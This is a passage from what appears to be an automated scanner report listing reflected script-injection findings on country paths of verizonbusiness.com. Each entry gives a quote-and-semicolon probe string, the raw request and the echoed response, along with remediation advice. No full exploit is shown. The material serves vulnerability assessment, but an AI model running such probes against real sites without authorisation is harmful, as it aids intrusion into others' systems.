Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:49 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/ar8f988";de4e7751f0d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.471. http://www.verizonbusiness.com/at/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /at/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a33a"%3b4aae26e279b was submitted in the REST URL parameter 1. This input was echoed as 4a33a";4aae26e279b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /at4a33a"%3b4aae26e279b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:04 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46790
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/at4a33a";4aae26e279b/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.472. http://www.verizonbusiness.com/at/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /at/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab853'%3b7f22bd307df was submitted in the REST URL parameter 1. This input was echoed as ab853';7f22bd307df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /atab853'%3b7f22bd307df/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:20 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46788
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/atab853';7f22bd307df/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.473. http://www.verizonbusiness.com/au/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /au/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 575d9"%3b9536fc22c0e was submitted in the REST URL parameter 1. This input was echoed as 575d9";9536fc22c0e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /au575d9"%3b9536fc22c0e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/au575d9";9536fc22c0e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.474. http://www.verizonbusiness.com/au/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /au/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45413'%3bad2c5fa4100 was submitted in the REST URL parameter 1. This input was echoed as 45413';ad2c5fa4100 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /au45413'%3bad2c5fa4100/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:41 GMT
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/au45413';ad2c5fa4100/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.475. http://www.verizonbusiness.com/be/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /be/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56300"%3b62e1f7a15f was submitted in the REST URL parameter 1. This input was echoed as 56300";62e1f7a15f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /be56300"%3b62e1f7a15f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/be56300";62e1f7a15f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.476. http://www.verizonbusiness.com/be/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /be/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6722'%3b2647232b65f was submitted in the REST URL parameter 1. This input was echoed as a6722';2647232b65f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bea6722'%3b2647232b65f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:50 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/bea6722';2647232b65f/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.477. http://www.verizonbusiness.com/br/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /br/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22b84'%3b430c445e2d1 was submitted in the REST URL parameter 1. This input was echoed as 22b84';430c445e2d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /br22b84'%3b430c445e2d1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/br22b84';430c445e2d1/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.478. http://www.verizonbusiness.com/br/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /br/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52502"%3b087f648069a was submitted in the REST URL parameter 1. This input was echoed as 52502";087f648069a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /br52502"%3b087f648069a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:55:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/br52502";087f648069a/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.479. http://www.verizonbusiness.com/ca/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ca/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47483'%3b9b048c90bc4 was submitted in the REST URL parameter 1. This input was echoed as 47483';9b048c90bc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ca47483'%3b9b048c90bc4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40743
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/ca47483';9b048c90bc4/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.480. http://www.verizonbusiness.com/ca/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ca/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c241"%3bd40d9908d5b was submitted in the REST URL parameter 1. This input was echoed as 4c241";d40d9908d5b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ca4c241"%3bd40d9908d5b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40743
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/ca4c241";d40d9908d5b/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.481. http://www.verizonbusiness.com/ch/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ch/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeb35"%3b3964adae0ff was submitted in the REST URL parameter 1. This input was echoed as eeb35";3964adae0ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cheeb35"%3b3964adae0ff/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40820
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/cheeb35";3964adae0ff/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.482. http://www.verizonbusiness.com/ch/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ch/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6d7a'%3bd34ef7e9b8e was submitted in the REST URL parameter 1. This input was echoed as a6d7a';d34ef7e9b8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cha6d7a'%3bd34ef7e9b8e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40820
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/cha6d7a';d34ef7e9b8e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.483. http://www.verizonbusiness.com/cl/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /cl/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c78b8'%3b45cebbc83db was submitted in the REST URL parameter 1. This input was echoed as c78b8';45cebbc83db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clc78b8'%3b45cebbc83db/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
